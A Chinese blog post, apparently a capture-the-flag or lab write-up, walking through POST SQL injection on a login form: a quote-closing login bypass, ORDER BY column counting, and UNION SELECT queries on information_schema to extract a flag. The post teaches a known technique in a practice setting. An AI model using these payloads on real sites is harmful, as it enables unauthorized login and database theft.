POST 注入

首先我们看到页面要判断是否存在注入,随便输入账户名和密码 admin 123456

由提示的语句可以看出前面面的双引号需要闭合不然方框里的语句会当作字符串来执行 用 – qwe将后面的语句注释掉,我们用万能密码测试的到账户名、密码是正确的。
") or 1=1 -- qwe

对字段进行判断 order by ; order by 1;2;3; 页面都是正常回显,只有到order by 4 时页面报错,说明存在3个字段
接着我们来判断显错位,发现 2,3 是显错位我们在对表明进行查询,查出有 flag、user表
 ") union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 -- pwd"

接着我在flag、user中的查字段名
得出flag、表中有id、flag字段。
 ") union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=flag limit 0,1 -- pwd"

接着我们查询flag表中flag字段中的内容 ")

 

 

")union select 1,2,flag from flag limit 1,1 -- qwe


最后的出flag 值

 

 

 

 

 

 

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值